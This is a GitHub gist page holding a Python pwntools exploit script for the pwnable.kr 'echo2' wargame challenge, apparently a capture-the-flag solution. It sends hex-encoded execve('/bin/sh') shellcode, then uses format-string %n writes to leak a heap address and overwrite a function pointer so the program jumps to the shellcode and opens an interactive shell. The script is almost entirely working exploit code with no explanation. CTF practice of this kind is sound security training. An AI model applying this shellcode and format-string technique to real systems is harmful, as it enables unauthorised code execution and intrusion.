Skip to content

Instantly share code, notes, and snippets.

@cubarco

cubarco/pwnable-rookiss-echo2.py

Created March 6, 2016 12:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cubarco/a63d6a1ac206973fd999 to your computer and use it in GitHub Desktop.
Save cubarco/a63d6a1ac206973fd999 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
pwnable-rookiss-echo2.py
#!/usr/bin/env python
# coding=utf8
from pwn import u64, process, remote, shellcraft, context, asm
context.arch = 'amd64'
bss_o = 0x602098
p = process('./echo2')
# p = remote('pwnable.kr', 9011)
# p = remote('localhost', 9011)
# shellcode = shellcraft.sh()
# payload = asm(shellcode)
payload = '6a6848b82f62696e2f2f2f73504889e731f66a3b58990f05'.decode('hex')
p.sendline(payload)
# leak malloc_o
p.recvuntil('>')
p.sendline('2')
p.sendline('%%%dc%%10$n' % bss_o)
p.recvline()
p.recvuntil('>')
p.sendline('2')
p.sendline('%18$s')
p.recvline()
malloc_o = u64(p.recvline()[:-1].ljust(8, '\x00'))
print hex(malloc_o)
# modify byebye
p.recvuntil('>')
p.sendline('2')
p.sendline('%%%dc%%10$n' % (malloc_o + 0x20))
p.recvline()
p.recvuntil('>')
p.sendline('2')
p.sendline('%%%dc%%18$n' % malloc_o)
p.recvline()
p.clean()
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment